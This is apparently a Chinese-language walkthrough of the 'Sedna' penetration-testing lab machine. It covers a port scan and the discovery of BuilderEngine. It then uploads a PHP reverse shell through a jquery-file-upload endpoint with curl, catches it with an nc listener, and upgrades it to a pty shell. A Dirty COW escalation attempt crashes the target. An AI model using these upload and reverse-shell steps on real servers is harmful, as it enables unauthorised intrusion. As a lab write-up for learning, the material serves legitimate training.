Sedna渗透实战

靶机IP：192.168.8.153
任务：获取4个flag
分别在shell，root，还有靶机中

image.png

nmap -sS -Pn -A -p- 192.168.8.153

image.png

这个靶机开放了好多端口服务

80web渗透

image.png

80的web翻遍了都是图片，扫目录发现了

http://192.168.8.153/files/
http://192.168.8.153/modules/

不过没什么可利用的

访问robots.txt，发现一个被禁止访问的目录

访问license.txt

发现了

image.png

Copyright (c) 2012 - 2015 BuilderEngine / Radian Enterprise Systems Limited.

搜索BuilderEngine exp ，在exploit-db找到漏洞利用的脚本

<https://www.exploit-db.com/exploits/40390

image.png
用curl命令以POST方式将file上传到

http://192.168.8.153/themes/dashboard/assets/plugins/jquery-file-upload/server/php/index.php

该路径下

curl -F "files=@php-reserve-shell.php" http://192.168.8.153/themes/dashboard/assets/plugins/jquery-file-upload/server/php/index.php

image.png

kali开启nc监听

nc -lvp 4444

触发反弹

image.png

用python切一下shell

python -c 'import pty;pty.spawn("/bin/bash")'

在var/www目录中找到flag1

image.png

flag1: bfbb7e6e6e88d9ae66848b9aeac6b289

脏牛提权

查看系统版本信息：

uname -a

image.png

发现是14发行的，可以用脏牛提权试试

用curl -F 将dirty.c脚本上传到靶机/var/www/html/files

image.png

执行提权

崩了

脏牛威力太大了，靶机崩溃

无法提权

总结

该靶机在后续的脏牛提权中屡次崩溃，有兴趣的同学可以试试其他的提权方式
1、在本次渗透中，主要学习到了 利用 curl 命令上传文件的操作

curl -F "files=@filename" http://ip/../../

靶机百度云下载
链接：https://pan.baidu.com/s/18zDWNQc0Mz9VfQS1o8QyHQ
提取码：j15e